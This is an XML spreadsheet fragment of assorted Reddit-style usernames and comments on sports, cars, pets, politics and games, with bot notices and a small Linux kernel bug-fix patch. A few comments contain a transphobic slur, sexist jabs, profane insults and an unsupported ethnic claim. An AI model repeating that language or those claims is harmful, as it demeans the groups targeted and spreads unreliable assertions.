    <t>&gt;&gt;95075448 Their whole "sport" is a fixed joke. That Canelo 118-110 score and Fury fight being judged as a draw makes their whole sport uninspiring and pointless. Some fat cats fix the fights and 99% of the "fights" are boring to watch; you literally have to force yourself to pretend like you're enjoying two guys hit each other with pillows to earn points. They can't elbow, they can't clinch, they can't kick. Paulie getting worked by a guy who has a losing record exposed their whole sport as a sham</t>
  </si>
  <si>
    <t>borizakalia</t>
  </si>
  <si>
    <t>How long did it take you?</t>
  </si>
  <si>
    <t>EYEMNOBODY</t>
  </si>
  <si>
    <t>Because Hillary may hate Donny for kicking her ass in the election but that doesn't mean they're not on the same team and working together you partisan git.</t>
  </si>
  <si>
    <t>Eka414</t>
  </si>
  <si>
    <t>I would ask the Dr what the best thing is to put on it, we use hydrocortisone. Also use plenty of bug spray to prevent bites.</t>
  </si>
  <si>
    <t>In an effort to reduce the amount of spam in /r/books, this post was removed because your account is less than 1 day old (we get a lot of spam from newly created accounts). Since you look new to reddit, please be sure you have read through our [**subreddit rules**](http://www.reddit.com/r/books/wiki/rules) before participating in the community. If you have any questions or think your post should be reinstated, please [**message the mods**](http://www.reddit.com/message/compose?to=%2Fr%2Fbooks). --- *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/books) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Karlos28</t>
  </si>
  <si>
    <t>Wonder why they detuned it like that?? To be honest, I'm not overly concerned with power.. all will get me where I want to go. I did want to scratch the V8 itch... But I don't think that's doable at this time, purely due to the size restriction on my drive/garage. Anyway.... Changing a water pump is no issue, I can diy that. Is the 135i engine less reliable due to the turbos? Or does it have other issues too? I'm also after an auto, is the gearbox the same between the two? My F20 120d had an amazing auto box, I'm guessing the E88 will have an older, 6speed box? Cheers for the replies! Ps. Feel free to add some photographic inspiration for me!</t>
  </si>
  <si>
    <t>WombatAnnihilator</t>
  </si>
  <si>
    <t>Because wifi fucking sucks at work, thats why.</t>
  </si>
  <si>
    <t>Primuds</t>
  </si>
  <si>
    <t>Great product placement.</t>
  </si>
  <si>
    <t>JinKesef</t>
  </si>
  <si>
    <t>[PROOF](https://imgur.com/gallery/yjS4mzc) x20 Junk Morgan Dollar Coins $17 each plus shipping x10 1986 (Roman Numerals) 1/10 ounce Gold Eagle Coins $155 each plus shipping $10 FV 1 Roll of 90% silver quarters $125 plus shipping 1 Roll of 2015 American Silver Eagles $370 plus shipping 9oz Bunker Bullion Poured Bar $180 plus shipping 1oz Buffalo Silver Round $17.25 plus shipping 1oz Police Silver Round $17.25 plus shipping 1oz Steamboat Willy Mickey Mouse Silver Round $22 plus shipping Shipping is to only within the USA PPFF, Venmo, and CashApp I am willing to work with a middle man but you will have to pay for shipping and willing to send first if a mod will vouch for you</t>
  </si>
  <si>
    <t>Jiditus</t>
  </si>
  <si>
    <t>I'm pretty sure almost every person overpricing i've seen is always selling a a trash cydra deck</t>
  </si>
  <si>
    <t>RawStanky</t>
  </si>
  <si>
    <t>Would you prefer they take the Apex Legends route?</t>
  </si>
  <si>
    <t>unsungheroist</t>
  </si>
  <si>
    <t>im not one to product plug but the fix is going to be harder than the work around. use that software its free for 30days full unlock EaseUS MobiMover</t>
  </si>
  <si>
    <t>Hello /u/its_out-thar! Unfortunately, your post has been removed. To protect the subreddit from advertising spam, ban evasions and abuse, we no longer allow new/inactive users to make submissions, you need to build up some post, comment karma and history. In the mean time, please be sure to familiarize yourself with our sidebar rules: &gt;/r/memes/about/rules &gt; &gt;r/memes/about/sidebar In order to achieve the threshold, we ask you to post to other subs around Reddit, and contribute in comments to build up your post and comment karma. You can hover over your karma on your profile to see the difference between post and comment karma, as we do **not** evaluate your overall karma. This may explain why you often see someone with "higher" overall karma able to post. *You are welcome to comment in r/memes* in order to spend some time getting to know our community, then you'll be welcome to make submissions. Thanks for understanding! #NOTE: **Do not message us asking how much karma you need or how old your account must be.** The threshold for post and comment karma is **VERY** low and will not take you long. Persistent ignoring of this message will result in you being muted. #REPEAT: DO NOT MESSAGE US ABOUT THIS. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/memes) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>jcotton42</t>
  </si>
  <si>
    <t>Eh? They just released episode 151</t>
  </si>
  <si>
    <t>TomatoTheIII</t>
  </si>
  <si>
    <t>[This will explain both the scriptural case and some of the History.](http://www.staycatholic.com/praying_to_saints.htm)</t>
  </si>
  <si>
    <t>-Aeryn-</t>
  </si>
  <si>
    <t>You can (and should) do blended beans and stuff like that but typical high-volume wfpb foods (fruit&amp;vegetable spam) likely won't work well</t>
  </si>
  <si>
    <t>wierdinnit</t>
  </si>
  <si>
    <t>I'll do you a favor and rent out those things you use to unlock your front door. Initials A K. The Jamaican lad thinks those fellas that live in heaven aren't flying high enough. Initial D. That thing i use to strain my pasta just tried to thump me. Initials M A. Email only and you can win a copy of the Pelican Brief on VHS.</t>
  </si>
  <si>
    <t>" My first time to order and I was very pleased how quickly everything was taken care of with my order. I will definitely use them again "</t>
  </si>
  <si>
    <t>SwynFlu</t>
  </si>
  <si>
    <t>My usual rhotic phoneme is the retroflex approximant [ɻ] (which is odd considering my dialect doesn't feature it) and I can do an alveolar trill [r] and uvular trill [ʀ] fine, but for the purpose of learning Scottish Gaelic I can't for the life of me flap my R...any pointers appreciated.</t>
  </si>
  <si>
    <t>Ignitus1</t>
  </si>
  <si>
    <t>Takedowns and kills are completely different things. A kill is when you deal fatal damage, an assist is when you assisted in a kill, and a takedown is when you do either of those. Trait or passive makes no difference. Trait is probably better because passive effects can be put on other abilities or talents but there’s only one trait. Calling them Monk or Medic makes no sense either. Those aren’t their names and we don’t call Diablo “demon” or Johanna “crusader” or Murky “murloc”. Monk and Medic are just shortcuts for lazy players. Consistency is important in presentation. If half the casters use one name and half use the other it causes confusion. It’s also straight up incorrect to use the wrong names.</t>
  </si>
  <si>
    <t>SteSte8</t>
  </si>
  <si>
    <t>So for some reason, he wants the GTX for the Fortnite bundle, dumb ass idea, but he’s my bro.</t>
  </si>
  <si>
    <t>dsfife1</t>
  </si>
  <si>
    <t>The hmm post also doesn’t have a rhyme, which is kinda the point of this sub. A large portion of this subs is crossposts like this</t>
  </si>
  <si>
    <t>ShiggieSmalls</t>
  </si>
  <si>
    <t>Regina Spektor did a cover of that song for the soundtrack to Kubo and the Two Strings.</t>
  </si>
  <si>
    <t>doubledipy</t>
  </si>
  <si>
    <t>People can be fucking nuts!</t>
  </si>
  <si>
    <t>White_Nothing</t>
  </si>
  <si>
    <t>This is what Jason would look like if he was a really thin tranny.</t>
  </si>
  <si>
    <t>alphakari</t>
  </si>
  <si>
    <t>So they aren't interested in negotiating. Sounds like they gave you their answer.</t>
  </si>
  <si>
    <t>EndlessMaria</t>
  </si>
  <si>
    <t>QPR said: Looks like we have another prude here, how on earth can anyone think boobs=bad but violence and gore=good. I hope Japan makes even more Ecchi because there isn't enough and they turn it up to 11 like in Manyuu Hikenchou just to annoy the femnazis..</t>
  </si>
  <si>
    <t>adredd</t>
  </si>
  <si>
    <t>This is really great! Giving me inspiration to actually record something. Loved my MicroBrute as well, and just upgraded to a MiniBrute 2S. Actually, love all my Arturia stuff, hard and soft.</t>
  </si>
  <si>
    <t>run-as-admin</t>
  </si>
  <si>
    <t>Are there any reasonable alternatives though?</t>
  </si>
  <si>
    <t>kombatunit</t>
  </si>
  <si>
    <t>It's an attempt to discredit their political foes.</t>
  </si>
  <si>
    <t>Zootrainer</t>
  </si>
  <si>
    <t>I think you are asking too much of your puppy. She wasn't being rude. She's just very young and beginning to learn about how to play. It's completely expected that she will sometimes be too rambunctious or overexcited. That's part of learning. It wouldn't be "learning" if she already knew how to do all this stuff. We don't expect human children to know how to play nicely until they have years of experience and guidance. Nor would we assume that a young child that grabs a toy from another or runs around yelling in fun will grow up to be an out-of-control adult. If you are referring to Karen Overall's Relaxation Protocol, that is meant for adolescent and adult dogs, not puppies. It's much too strict and overly intense for a young puppy. I'm not sure if your trainer gave you that list of ideas to help with behavior at home, but they are unlikely to help with high energy play you indicated in your post. What would help is to give your puppy more breaks at a puppy social (meaning, calmly put her on leash and lead her off to a quiet corner to relax for a few minutes). You'll have to watch carefully so that you can give her the break before she starts getting too wound up, because you don't want her to feel that she is being punished over and over. These are just mental timeouts, not punishment timeouts. They may help with #2 in your list, but it's not unusual at all for puppies to be go, go, go when awake. Many do not have an off-switch in terms of laying down for a nap on their own, because the world is too exciting for that. So try not to worry about your puppy's energy level, and be patient with her. It will take time and more maturity before she'll be able to settle on her own. As far as playing with older dogs, it would be good to find dogs that are tolerant of the puppy and also interested in playing. It's fine for some encounters to be with cranky adult dogs who warn off any puppy who does more than approach and sniff or roll over. But it doesn't help your puppy learn to play nicely if the other dog isn't interested in playing at all. And pinning a puppy (even if the release is fast) is pretty far along the spectrum of warnings. You'll need to intervene before it gets to that point.</t>
  </si>
  <si>
    <t>IGuessIRanOutOfChara</t>
  </si>
  <si>
    <t>Username does not check out.</t>
  </si>
  <si>
    <t>Amphibious_Fire</t>
  </si>
  <si>
    <t>It worked out pretty nicely with garbage in a Futurama episode so why not?</t>
  </si>
  <si>
    <t>Chappies89</t>
  </si>
  <si>
    <t>Nope not this often. In other countries people go, "I want to shoot person x because reason y." And they set out to do just that. They don't open fire on innocent strangers going about their way. It's still terrible but the numbers are far fewer.</t>
  </si>
  <si>
    <t>Jcars302yt</t>
  </si>
  <si>
    <t>A gun some have iron which is consumed</t>
  </si>
  <si>
    <t>DaDARKPass</t>
  </si>
  <si>
    <t>Iranians are ethnically euroepan. Done, argument's over.</t>
  </si>
  <si>
    <t>hf3gdg555</t>
  </si>
  <si>
    <t>How to make Bubble Machine</t>
  </si>
  <si>
    <t>L-and</t>
  </si>
  <si>
    <t>I think you have a bigger problem than pizza falling apart if you're putting shit on it.</t>
  </si>
  <si>
    <t>jmusmc_85</t>
  </si>
  <si>
    <t>Well, it was just the first thing that popped in my mind. Show me another picture of people falling to earth and I’ll say the same. Wasn’t trying to get offensive or anything. That’s what it honestly reminded me of. ‍♂️ http://photos1.blogger.com/blogger/6223/161/1600/jumper10.jpg</t>
  </si>
  <si>
    <t>wikipedialyte</t>
  </si>
  <si>
    <t>big spot with the set up man or closer facing a righty with 1 or 2 outs and a lefty due up in a clutch spot</t>
  </si>
  <si>
    <t>Deadpoppin</t>
  </si>
  <si>
    <t>Who gives a shit, shut up</t>
  </si>
  <si>
    <t>Slimy_Shart_Socket</t>
  </si>
  <si>
    <t>Buy CPO from a dealer. I work as a mechanic, have done both dealer and private sector. Unless the car is near new bought from a used lot I almost always find a list of problems a mile long and the dealer won't want to do a thing. I once got yelled at by the owner of a dealership that was with the customer who wanted a pre-purchase inspection. The Vehicle Sales Authority says the car has to last a reasonable amount of time. So if the engine blows in a year and you got your oil change receipts then they have to do something. If the car is a rebuild and they don't disclose it you can get your full value back.</t>
  </si>
  <si>
    <t>freakers</t>
  </si>
  <si>
    <t>What if we create a restaurant where all the food and drinks are free but you need to pay to use the bathroom? Genius I tell ya. People are gonna be storming in for the drinks then flooding to the bathroom and there's no possible way it would go awry.</t>
  </si>
  <si>
    <t>ANM775</t>
  </si>
  <si>
    <t>(Original post by Anonymous) i come from a lower middle class family, but my aunt had an incredibly successful career as a lawyer and when she died an inheritance was set up for me to get when i turned 18. it wasnt an insane amount of money, but it was very decent (more than a lot of people make in a year i guess) and for a short while i didnt even touch it because i just didnt know what to do with it. however i soon began donating towards charities and causes, like campaigns you see online or people i came across who were struggling financially. i was a kid and wouldnt die if i didnt have money, but there were a lot of people who would so i saw it as a better place for it to go. ths isnt to say i didnt spend any of it myself, i bought myself some nice things here and there if i thought i could justify it, and i got friends and family a lot of great gifts that year for birthdays, christmas, celebrations, etc. now im a bit older and i still have a small amount of it left, but not nearly as much. i guess my conflict is that now as an adult with responsibilities i can see that i couldve saved that money and i would have more security with my life now, but i know that it went to good causes and people in need. there are times where i wish i hadnt given it away, like when i can see my mum having to dip into savings to pay for necessary house renovations or my sister having to get jobseekers' allowance when she lost her job, but then i feel guilty for that because what kind of cruel person wishes they didnt give to charity?! idk, maybe this is coming off as martyr-y or whatever, but i just needed to get this off my chest. I originally read the topic title ..and without seeing the thread, made up my mind that you had wasted it. However, after seeing what it was used for, I would say what you did with your money few people in your position would do ...and that you did a very kind thing. The money is gone now. The past is the past and there's no point dwelling on it. But your money has helped people less fortunate than yourself. You don't directly see the impact you made, but you made an impact to people's lives.</t>
  </si>
  <si>
    <t>csgonoob0</t>
  </si>
  <si>
    <t>I just got the exact same iPad Air with the headphones :D the W1 chip is so useful if you have another apple device in those beats. Nothing beats free headphones anyway.</t>
  </si>
  <si>
    <t>MedalofHonour15</t>
  </si>
  <si>
    <t>You have to use America's system for your own personal gain then help others. It is sad to see so many people fall victims to scams and fraud. However, you can go from poor to rich quicker in America than most other countries. I love capitalism just wish it was more of a balance.</t>
  </si>
  <si>
    <t>In_Dux</t>
  </si>
  <si>
    <t>YES! Even if you want to make it exclusive to Small Game if you feel that's too much info just to give to every survivor. Or just give the counter and maybe let Small Game slightly increase cleansing time. I just love that perk. Lol</t>
  </si>
  <si>
    <t>Ibeatadrianinmadden</t>
  </si>
  <si>
    <t>.....really? It's not just made so that people can die from it.</t>
  </si>
  <si>
    <t>ThatDudeWithoutKarma</t>
  </si>
  <si>
    <t>I don't care what people say Reach was such an amazing game and story in my opinion too. Even if they retconned some already established lore with it.</t>
  </si>
  <si>
    <t>zeyulux</t>
  </si>
  <si>
    <t>When you're trying to prove a point to your girlfriend.</t>
  </si>
  <si>
    <t>ceedes</t>
  </si>
  <si>
    <t>You never cheat on a Bunny with a Karen. Is this guy out of his mind?!</t>
  </si>
  <si>
    <t>Greg Kroah-Hartman</t>
  </si>
  <si>
    <t>[ Upstream commit 02551c23bcd85f0c68a8259c7b953d49d44f86af ] When fget fails, the lack of error-handling code may cause unexpected results. This patch adds error-handling code after calling fget. Link: http://lkml.kernel.org/r/2514ec03df9c33b86e56748513267a80dd8004d9.1558117389.git.jaharkes@cs.cmu.edu Signed-off-by: Zhouyang Jia Signed-off-by: Jan Harkes Cc: Arnd Bergmann Cc: Colin Ian King Cc: Dan Carpenter Cc: David Howells Cc: Fabian Frederick Cc: Mikko Rapeli Cc: Sam Protsenko Cc: Yann Droneaud Signed-off-by: Andrew Morton Signed-off-by: Linus Torvalds Signed-off-by: Sasha Levin --- fs/coda/psdev.c | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/fs/coda/psdev.c b/fs/coda/psdev.c index f40e3953e7fe3..a6d9e841a375c 100644 --- a/fs/coda/psdev.c +++ b/fs/coda/psdev.c @@ -187,8 +187,11 @@ static ssize_t coda_psdev_write(struct file *file, const char __user *buf, if (req-&gt;uc_opcode == CODA_OPEN_BY_FD) { struct coda_open_by_fd_out *outp = (struct coda_open_by_fd_out *)req-&gt;uc_data; - if (!outp-&gt;oh.result) + if (!outp-&gt;oh.result) { outp-&gt;fh = fget(outp-&gt;fd); + if (!outp-&gt;fh) + return -EBADF; + } } wake_up(&amp;req-&gt;uc_sleep); -- 2.20.1</t>
  </si>
  <si>
    <t>embolia6</t>
  </si>
  <si>
    <t>Gosh, I remember following updates on this as they happened and being floored at the audacity Billy had to constantly be so deceitful! And then seeing both of the documentaries just seriously blew my mind!</t>
  </si>
  <si>
    <t>gjbankos</t>
  </si>
  <si>
    <t>Time to pay the BARR TAB!</t>
  </si>
  <si>
    <t>edman007-work</t>
  </si>
  <si>
    <t>An iPod will have an internal quartz clock, I'm not positive, but I suspect the clock is set by iTunes when you sync it (which will mean it stays accurate as long as you sync it at least every few months).</t>
  </si>
  <si>
    <t>ElectionsGuy</t>
  </si>
  <si>
    <t>Hickman lol. This is a D internal, so Hood is probably losing by a few points. There are also a ton of undecideds, so that reduces the usefulness of the poll.</t>
  </si>
  <si>
    <t>TheOtherHelvegen</t>
  </si>
  <si>
    <t>He reminds me of Scoob from the webcomic Scoob and Shag</t>
  </si>
  <si>
    <t>KlaireOverwood</t>
  </si>
  <si>
    <t>It seems like your job is a lot of googling and typing. And artists? It's their freaking hobby, why won't they paint for me for free?? A lot of the time, it's not about how much you sweat, it's what you bring to the table.</t>
  </si>
  <si>
    <t>mojomonkeyfish</t>
  </si>
  <si>
    <t>Yeah, but you have to build caissons to build the foundation for the coffer dam. It's caissons all the way down.</t>
  </si>
  <si>
    <t>RexTwerkHead</t>
  </si>
  <si>
    <t>What do you mean, they have basically the same styles</t>
  </si>
  <si>
    <t>jmr106</t>
  </si>
  <si>
    <t>I can't tell if you've directed that question at me or someone else.</t>
  </si>
  <si>
    <t>UnSafeHairBall</t>
  </si>
  <si>
    <t>I used to chainsmoke daily and had bad ibs, bloating and nausea daily. When I tried taking the tolerance break that's when the vomiting started. Smoking to cure the vomiting just made things worse. Once I stopped smoking for 2 weeks all my gut issues went away. No cramps, bloating, ibs or nausea, my anxiety even got better.</t>
  </si>
  <si>
    <t>notifier-bot</t>
  </si>
  <si>
    <t>Click [here](https://www.reddit.com/message/compose/?to=notifier-bot⊂ject=ctdxln&amp;message=Click%20%27send%27%20to%20be%20notified%20if%20OP%20marks%20%27%5BTOMT%5D%20%5BSONG%5D%20Help%20me%20identify%20this%20song%20with%20catchy%20riff%3F%27%20as%20solved.%20You%20should%20receive%20a%20confirmation%20PM%20soon.%0A%0A----------%0A%0AOfficial%20reddit%20app%20users%20might%20need%20to%20type%20something%20in%20the%20message%20body%20before%20the%20send%20button%20is%20enabled.%0A%0AThis%20bot%20is%20still%20in%20beta%2C%20sorry%20if%20you%20come%20across%20any%20bugs.%20PM%20u/adityapstar%20if%20you%20have%20any%20questions/comments/complaints.) if you'd like to be notified when this post is solved.</t>
  </si>
  <si>
    <t>comfortablesexuality</t>
  </si>
  <si>
    <t>It's in the name you dumbass. ABUSE of animations.</t>
  </si>
  <si>
    <t>REEeeEeEeEee42069</t>
  </si>
  <si>
    <t>127 tables, and 111 gold in a stack,XD</t>
  </si>
  <si>
    <t>hexxatic</t>
  </si>
  <si>
    <t>Not sure if r/personalfinance is the right place, if not, please point me in the right direction. I've long used my Paypal business debit card as a pseudo bank card for the cash back. I have my checking account setup as a backup funding source, which it pulls from when my PP balance isn't sufficient. Been doing this for years, next to no issues. Now as I'm reconciling my accounts, I notice three charges that should have long hit my bank. PP shows them as complete. I call my bank, the don't see them either (nor an incoming). I call PP "oh sir, we show them as paid, please check your bank statements more thoroughly". I call my bank again, this time the main office, they are baffled. It's been seven business days on the oldest one. These normally hit my bank within 48 hours. Latest I've ever seen is 4-5 days. Does anyone have any idea what is going on here? And how long should I leave the money sit before I move it back into my budget? I don't want this correcting itself later and leaving me overdraft. Thanks!</t>
  </si>
  <si>
    <t>Emmanuel_Typewriter</t>
  </si>
  <si>
    <t>To be asleep in eight minutes.</t>
  </si>
  <si>
    <t>shian243</t>
  </si>
  <si>
    <t>Just curious, why isn't there much Northern lights portraits? I know it's not easy, but with strobes can't someone get a nice still shot of someone, back-lit by the northern lights? Alot of portraits I've seen are very harsh because the tour agencies shine with a torch and take a long exposure. Either way, can't people do 2 shots and composite?</t>
  </si>
  <si>
    <t>Moks74</t>
  </si>
  <si>
    <t>Imo very good. I own a couple of ICS's which are great out of the box and Krytac (got a Vector) out of the box is evenly impressive. Too bad Krytac doesn't have split gear box as ICS tho.</t>
  </si>
  <si>
    <t>xanax101010</t>
  </si>
  <si>
    <t>I'm from Brazil, Free Lula! We need to defeat Bolsonaro's explicit fascism</t>
  </si>
  <si>
    <t>LeviBellington</t>
  </si>
  <si>
    <t>No I didnt mean it's not worth it, ive paid 60€ for games with less than 20hrs, its just Im broke lol</t>
  </si>
  <si>
    <t>DrBarnabyFulton</t>
  </si>
  <si>
    <t>A neighbor I had in an apartment complex would leave a bread trail into his ground floor apartment. Then CHOP. Except, here it's illegal as hell to kill a migratory water fowl (without a few permits) so... he was "removed" by the DNR.</t>
  </si>
  <si>
    <t>abbie_whitehead1</t>
  </si>
  <si>
    <t>The men's ranking and points have changed but they haven't officially listed places for the 4th event.</t>
  </si>
  <si>
    <t>keithwaits</t>
  </si>
  <si>
    <t>sucking tide pods through plastic straws or something</t>
  </si>
  <si>
    <t>DonVito68</t>
  </si>
  <si>
    <t>Lying is a sin. If biblical characters jumped off a tall bridge, would you do the same? Follow Jesus and he didn't lie so neither should you. *(Leviticus 19:11) “ ‘Do not steal. “* ***‘Do not lie****. “ ‘Do not deceive one another.* *(Proverbs 12:22)* ***The LORD detests lying lips,*** *but he delights in people who are trustworthy.* *(p**roverbs 6:16-19**)* *There are six things which the LORD hates, Yes, seven which are an abomination to Him: Haughty eyes,* ***a lying tongue****, And hands that shed innocent blood, A heart that devises wicked plans, Feet that run rapidly to evil* *(**Proverbs 14:25**)* *A truthful witness saves lives, But* ***he who utters lies is treacherous****.* *(**Proverbs 19**:5)* *A false witness will not go unpunished, And* ***he who tells lies will not escape****.*</t>
  </si>
  <si>
    <t>braiser77</t>
  </si>
  <si>
    <t>They know how that ends too. It's what they are driving at.</t>
  </si>
  <si>
    <t>Platypuslord</t>
  </si>
  <si>
    <t>Tarzan is the son of a British lord and lady who were marooned on the Atlantic coast of Africa by mutineers. When Tarzan was an infant, his mother died, and his father was killed by Kerchak, leader of the ape tribe by whom Tarzan was adopted.</t>
  </si>
  <si>
    <t>Dsands421</t>
  </si>
  <si>
    <t>If they make target shirts with LGBT colors and flags on them then you better be fucking allowed to wear one with an American flag...</t>
  </si>
  <si>
    <t>MADminer1003</t>
  </si>
  <si>
    <t>I suggest the vfc 416a5 but I'm extremely biased</t>
  </si>
  <si>
    <t>MomsPashgetti</t>
  </si>
  <si>
    <t>Hey... Something's odd about these jalapeños. Anyone else's fingers turn into fries?</t>
  </si>
  <si>
    <t>&gt;&gt;95026102 Wasnt dickbum part of the RB academy thing?</t>
  </si>
  <si>
    <t>cowkong</t>
  </si>
  <si>
    <t>That's common in the middle states of the US far as I know</t>
  </si>
  <si>
    <t>Groce_Nasty</t>
  </si>
  <si>
    <t>My build is almost complete, the only parts missing is my GPU and monitor. I’m running a Ryzen 3600 and I have about $800-900 to spend, I’m looking to play at 1440 and I would want to go with a 144hz, 1ms, 27” monitor. Should I wait for these 3rd party Radeon GPU’s to drop? Is there new monitor’s dropping soon after gamescon? I’m getting antsy but also I am wanting this PC to last me some time</t>
  </si>
  <si>
    <t>theumape</t>
  </si>
  <si>
    <t>[FREE] my mother playing in flower bed in the 60's</t>
  </si>
  <si>
    <t>MegaDriverX</t>
  </si>
  <si>
    <t>https://www.youtube.com/watch?v=c6Bs29vsZ1c 14:50 I've actually used the gun for multiple AA kills in RB so, I guess they were right? Two of them would be real nice specially with how fast they fire.</t>
  </si>
  <si>
    <t>logwoods</t>
  </si>
  <si>
    <t>for sure cause docs just gon be like Xans and alcohol????? Nooooo do not do that shit you will die</t>
  </si>
  <si>
    <t>SamsungCole</t>
  </si>
  <si>
    <t>While we know the process is frustrating, the eCommerce team is the only team with the resources available to assist with sales questions. They are the only point of contact able to help with online orders. I truly apologize we could not offer more help for you here. Be sure to click " ✓ Accept as Solution" when you find an answer that works for you. Please note, notification emails are a DO NOT REPLY address, you must log-in on the community page in order to respond.</t>
  </si>
  <si>
    <t>furious0331</t>
  </si>
  <si>
    <t>It's the Rich and Russians. FTFY.</t>
  </si>
  <si>
    <t>SuperSaxonThrasher</t>
  </si>
  <si>
    <t>Man on the silver mountain-Rainbow</t>
  </si>
  <si>
    <t>ysmain</t>
  </si>
  <si>
    <t>I don't have the ability to get one and I'm not ready to let my family know</t>
  </si>
  <si>
    <t>KittenKabootle23</t>
  </si>
  <si>
    <t>Yeah, he was behind the first death of the whole show.</t>
  </si>
  <si>
    <t>LAPOPPABAH05</t>
  </si>
  <si>
    <t>Well I'm 13 so at the moment it isn't something big, just trying to jump off of a part in a playground in 4th grade. I ended up breaking my arm</t>
  </si>
  <si>
    <t>greenbean_mua</t>
  </si>
  <si>
    <t>It was my junior year of highschool and I decided to start vaping and smoking weed bc everyone around me liked it so I gave it a try. After like a month of doing this, I had a nasty breakup and because of my past with self harm, my parents looked through my room to make sure I didn’t have sharp objects. They found a bottle of vape juice and a bag of weed. We had a huge fight and my step dad threatened to hit me and I called cps. (I now know I was in the wrong here) eventually everything simmered down for the night, but the next day at school I decide not to go home bc I “didn’t feel safe.” So my parents called the cops and reported me as a runaway. My mom was so fed up with me, she booked a flight to a state 2000+ miles away to live with my dad and I had 8 hours notice. Since then my relationship with my mom has gotten better than it ever has been, but I found out she’s been going to Nevada to get weed for her chronic illness and still tells me I shouldn’t smoke. If I didn’t move, I wouldn’t have met my boyfriend or gotten out of an abusive home life and I’m so much better off here.</t>
  </si>
  <si>
    <t>Ayr_Bear</t>
  </si>
  <si>
    <t>Just @ me next time... (But seriously, I feel ya. That’s rough).</t>
  </si>
  <si>
    <t>The chosen ones said he was a drunk, glutton and sinner...so, why does the Christian say he was perfect? Quoting: Anonymous Coward 72277427 He was sinless though dude. Quoting: CH0Z3N the choz3n is an idiot! he's a shill that says whatever he's told to say! lol doing G-d's Will is as simple as following the 10 Commandment. Jesus never failed in that respect! lol</t>
  </si>
  <si>
    <t>apharing1</t>
  </si>
  <si>
    <t>So they are the same as the PNC jerseys. Personally not a huge fan. Don't like the asymmetric red on the collar. Not sure what that "preview" they gave us a few days ago was for, that pattern does not appear to be on these. Maybe alternates?</t>
  </si>
  <si>
    <t>Pokuta_</t>
  </si>
  <si>
    <t>But it's so delicious</t>
  </si>
  <si>
    <t>ChrundlesRatStick</t>
  </si>
  <si>
    <t>That's what this system is designed to work around. A show with more exposure might get more people to rate it, but it will drive up the number of ratings, not the actual average rating.</t>
  </si>
  <si>
    <t>Shill_Borten</t>
  </si>
  <si>
    <t>They are not rethinking their position, they don't have one to begin with. Did Labor want the Adani mine to go ahead or not? Did they want house prices to crash or not? Did they want to people on the pension who saved up their super correctly to get hit with the franking credits changes or not? Do they want to push for a carbon tax or not? They had no actual beliefs and just did everything off polls. Populism at its worst. What a disgrace.</t>
  </si>
  <si>
    <t>MrPoltergeist67</t>
  </si>
  <si>
    <t>I’d probably move Monsoon up. It hasn’t had a great performance this year but the selection committee know its potential</t>
  </si>
  <si>
    <t>scadonl</t>
  </si>
  <si>
    <t>His response is prolly to drop impeachment talks</t>
  </si>
  <si>
    <t>Twizzatt</t>
  </si>
  <si>
    <t>The 63% one though</t>
  </si>
  <si>
    <t>forme2c</t>
  </si>
  <si>
    <t>In my case, when I added a line, all other lines on the plan had to the one plus promo already and the T-Mobile rep graciously added the same to the new line. I spoke to a representative on the phone.</t>
  </si>
  <si>
    <t>SEND_DOGS_PLEASE</t>
  </si>
  <si>
    <t>With stories about intergovernmental transfers, its worth noting that there is, ultimately, only one taxpayer. I don't particularly care if a given service is funded by one government or the other. When the province cuts a transfer for the municipalities, they're really saying that rich cities with good taxpayer bases can find a way to fund then, and poorer cities with weaker tax bases can get stuffed. As a Torontonian, Toronto will be just fine. It's everywhere else in Ontario that gets hammered harder by these changes.</t>
  </si>
  <si>
    <t>Murrdog559</t>
  </si>
  <si>
    <t>No boards that’s rough, and I wouldn’t know IG, he went straight into Pat V</t>
  </si>
  <si>
    <t>pounds_not_dollars</t>
  </si>
  <si>
    <t>Yes I'm single handedly keeping their economy afloat. I'm the single only tourist. Now you're trying to start a dick measuring contest cos you're incapable of separating ego with facts which is one of the worst symptoms of nationalism - no critical thinking. Just shut the fuck up</t>
  </si>
  <si>
    <t>_shinyzE</t>
  </si>
  <si>
    <t>Because you lost the game, welcome to league of legends</t>
  </si>
  <si>
    <t>Zambigulator</t>
  </si>
  <si>
    <t>I happen to agree with this guy so it's just a nice post to me (:</t>
  </si>
  <si>
    <t>riteofspring2</t>
  </si>
  <si>
    <t>Completely true.</t>
  </si>
  <si>
    <t>VRG-NRGYY</t>
  </si>
  <si>
    <t>Day 14. Today felix opened my cozy metal home and i thought i was going on an adventure with felix just like sven and joergen. Instead he made me a cuddly machine and later he even attached a magma block to warm me up in the winter. Unfortunately i touched the magma block too many times and i died. I know it wasnt felixs fault and i forgive him. Later that day i saw he made a shrine for me just like joergen #1 and he even drops grey wool on it every day. I hope felix sven and joergen have fun on their next adventure.</t>
  </si>
  <si>
    <t>SpitFiya7171</t>
  </si>
  <si>
    <t>Yeah, I mean I'm printing at 200'C for Hatchbox PLA. I've always printed at this temperature and just seems like so much changed when I upgraded to the Capricorn bowden tube. I don't imagine I have an issue with flow rate.. but at this point I'm willing to try. Maybe I can adjust the retraction speed as well.</t>
  </si>
  <si>
    <t>samtaclause</t>
  </si>
  <si>
    <t>Missed off them saying shes got small boobs</t>
  </si>
  <si>
    <t>Elendel19</t>
  </si>
  <si>
    <t>(ii) can sure be interpreted a lot of different ways..</t>
  </si>
  <si>
    <t>Meaghan1986</t>
  </si>
  <si>
    <t>I didn’t have to drink any water (scan done by my obstetrician)</t>
  </si>
  <si>
    <t>SleepNowMyThrowaway</t>
  </si>
  <si>
    <t>Let's get a six pack and fuck, or don't you drink?</t>
  </si>
  <si>
    <t>0DARK30</t>
  </si>
  <si>
    <t>Quote: : (Post 5293515) In the works.... http://www.slaggamfg.com/products https://m.facebook.com/SlaggaMFG Certainly one of my favorite Russian rifles!</t>
  </si>
  <si>
    <t>cook_suck</t>
  </si>
  <si>
    <t>have the same issue with kicking but if i go flat out kicking it takes me 13 minutes to do 2 lengths (i.e. 100m lol) so i simply dont have time to do much kicking practice. average 100 time proper freestyle is 1:45-1:50</t>
  </si>
  <si>
    <t>Kr0et</t>
  </si>
  <si>
    <t>So lord buckethead couldn't even get in?</t>
  </si>
  <si>
    <t>rapora9</t>
  </si>
  <si>
    <t>Okay, thank you for your answer.</t>
  </si>
  <si>
    <t>boreltje</t>
